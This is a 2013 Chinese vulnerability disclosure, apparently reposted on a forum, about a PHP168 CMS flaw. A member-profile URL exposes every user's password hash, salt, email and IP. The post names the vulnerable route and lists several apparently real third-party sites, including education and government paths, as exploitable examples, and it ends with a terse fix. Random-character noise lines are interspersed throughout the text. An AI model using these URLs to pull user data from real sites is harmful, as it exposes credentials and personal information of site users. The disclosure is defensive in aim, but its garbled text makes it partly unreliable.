|
简要描述: 国微PHP168中出现了一处神奇的array,可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。 详细说明:PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中,这个页面不会在前台使用,但可直接通过URL进行访问。页面路由为:/homepage.php/[用户名]/member-profile
3 q5 h6 j' r4 J+ O2 M/ s5 ~
) v4 c* Y4 S) o- h# H; P' }7 E0 p以PHP168官方演示站点为例,查看任意用户信息的页面链接为:* w1 p4 Y* G/ m( T9 b' C
- O. N1 ^6 M% f
http://php168.cn/com/homepage.php/admin/member-profile. Y) V6 K1 M2 I* Y; T+ {" t3 `' O
) V! g' L. H# l0 q2 D7 e& p由于该模块代码中出现了一句神奇的array,导致用户数据表内所有数据被当作数组取出直接显示出来。
- Z) c$ e) C/ p# bhttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg! e, ?: x B7 I% J9 {
- [+ S# S7 j, Q L
漏洞证明:该漏洞影响使用该CMS系统的站点,以PHP168官网上的客户案例为例:
4 m) G% T$ v4 l0 J6 U) a# U4 Z+ M; F. I
http://www.zjfzol.com.cn/homepage.php/admin/member-profile$ N/ E3 f/ G! d1 ?2 r6 c% t
" m! i3 {, k$ n2 e9 xhttp://www.scswl.cn/homepage.php/admin/member-profile
$ X% U3 i- `+ [' y5 m$ o! i, l7 m( k- ~
http://www.tunet.edu.cn/homepage.php/admin/member-profile. P+ m) d+ r/ v* o9 c
8 F1 e" v1 B7 b; S* i" {, q
http://www.itlead.com.cn/homepage.php/admin/member-profile
% f. c7 q( `0 F/ H( F" r5 N! F$ w3 |
http://www.aedp.cn/homepage.php/admin/member-profile
* i1 a v3 C8 b8 g# ~2 o3 T' B# I( T y. Z5 p( X! |
http://www.qianlongnews.com/homepage.php/test/member-profile
- ^, C; L& [% _$ f8 {# [# p3 v, X
http://ny.zlxk.com/gov/homepage.php/admin/member-profile 修复方案:去掉输出 [/td][/tr]
% j7 L) l9 r5 e& N$ k% K[/table] | 
发表于 2013-9-21 16:02:53
收藏
支持
反对